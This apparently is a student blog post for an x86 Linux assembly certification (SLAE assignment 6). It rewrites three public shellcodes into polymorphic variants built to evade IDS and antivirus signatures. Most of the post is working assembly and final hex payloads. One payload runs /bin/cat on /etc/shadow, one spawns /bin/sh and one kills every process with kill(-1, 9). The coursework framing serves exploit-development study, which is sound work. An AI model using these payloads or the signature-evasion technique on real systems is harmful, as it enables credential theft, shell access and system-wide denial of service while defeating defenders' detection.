linux/x86 polymorphic shellcode (SLAE assignment 6)

Hi All! Today we will take up assignment 6 from SLAE course.

Main objective of this assignment :

Take upto three shellcodes from shell-storm  and create polymorphic equivalent to beat pattern matching . 

Polymorphic shellcode should not be greater than 150% of original shellcode.

Many IDS/ antivirus systems detects normal signature of shellcodes, in order to evade such detection , An attacker can substitute normal instruction with the instructions which has similar functionality. we will look at three different shellcodes which can be made polymorphic in this post .

Shellcode 0x1:

http://shell-storm.org/shellcode/files/shellcode-758.php

original disassembly of text section: 

Shellcode length : 42 bytes

global _start			

section .text
_start:

xor    eax,eax
push   eax
push   0x7461632f
push   0x6e69622f
mov    ebx,esp

push   eax
push   0x776f6461
push   0x68732f2f
push   0x6374652f
mov    ecx,esp

push   eax
push   ecx
push   ebx

mov    ecx,esp
mov    al,0xb
int 0x80

polymorphic disassembly of text section:

Shellcode length : 55 bytes

; polymorphic shellcode for poly1_original
;Shellcode Length:  55
global _start			

section .text
_start:

;clear edx to zero. can be used instead of xor to clear out register
cdq
push   edx

; bypass fingerprint complete string /bin/cat
mov esi,0x8572743f
sub esi,0x11111110
mov dword [esp-4] , esi
sub esp,4

push 0x6e69622f

mov    ebx,esp

push   edx
push   0x776f6461
push   0x68732f2f
push   0x6374652f
mov    ecx,esp

push   edx
push   ecx
push   ebx

mov    ecx,esp
;leverage push to move syscall and clear instead of xor
push 0xb
pop eax
int 0x80

In this first polymorphic shellcode we make use of few new instructions which perform similar functionality to traditional instructions.

First we make use of cdq instruction  for  zeroing edx register instead of XOR which saves us a byte. we also make use of manual pushing of data to stack to evade fingerprinting full string “/bin/cat”. and finally leverage stack calls instead of mov instruction to clear our eax register and move respective system call.

final polymorphic shellcode :

“\x99\x52\xbe\x3f\x74\x72\x85\x81\xee\x10\x11\x11\x11\x89\x74\x24\xfc\x83\xec\x04\x68\x2f\x62\x69\x6e\x89\xe3\x52\x68\x61\x64\x6f\x77\x68\x2f\x2f\x73\x68\x68\x2f\x65\x74\x63\x89\xe1\x52\x51\x53\x89\xe1\x6a\x0b\x58\xcd\x80”

Shellcode 0x2 :

next shellcode is a simple bash shell  from shell-storm. It utilizes execve syscall to spawn a shell.

URL : http://shell-storm.org/shellcode/files/shellcode-811.php

Original disassembly of text section:

Shellcode length : 28 bytes

xor    eax,eax
push   eax
;push /bin/sh
push   0x68732f2f
push   0x6e69622f
mov    ebx,esp
mov    ecx,eax
mov    edx,eax
mov    al,0xb
int    0x80
xor    eax,eax
;exit call
inc    eax
int    0x80

polymorphic disassembly of text section:

Shellcode length : 23 bytes

;clear eax before use
sub    eax,eax
push   eax
push   0x68732f2f
push   0x6e69622f
mov    ebx,esp
mov    ecx,eax
;zero out edx
cdq
; use stack to push syscall
push 0xb
pop eax
int    0x80

Here, we can see from the original shellcode, it is utilizing execve sys call , followed by an exit call which is not needed , as execve if successful, does not return status and overwrites parent calling process text ,data and bss area.  we have replaced xor with sub to clear out eax register. and CDQ instruction which clears out edx by extending sign bit from eax(which is already cleared out). resulting shellcode is 5 bytes smaller than the original one 🙂

final polymorphic shellcode :

“\x29\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x99\x6a\x0b\x58\xcd\x80”

 

Shellcode 0x3:

This short shellcode kills all running process on a x86 system. it makes use of sys_kill syscall .

URL : http://shell-storm.org/shellcode/files/shellcode-626.php

Original disassembly of text section:

Shellcode length : 11 bytes

;original code from : http://shell-storm.org/shellcode/files/shellcode-626.php
xor    eax,eax
mov    al,0x25
push   0xffffffff
pop    ebx
mov    cl,0x09
int    0x80

polymorphic disassembly of text section:

Shellcode length : 11 bytes

;11 bytes
;use stack to clear out and push sys_kill syscall
push 0x25
pop eax
;push -1 directly 
push byte -1
pop ebx
push 0x9
pop ecx
int 0x80

In this polymorphic shellcode we completely rely on stack operations to move data into registers.

final polymorphic shellcode :

“\x6a\x25\x58\x6a\xff\x5b\x6a\x09\x59\xcd\x80”

link to github repo for the code :

https://github.com/strikergoutham/SLAE_assignments

This blog post has been created for the completing the requirements of SecurityTube Linux Assembly Expert  certification.

(https://www.pentesteracademy.com/course?id=3)

 

SLAE student ID :  SLAE – 1367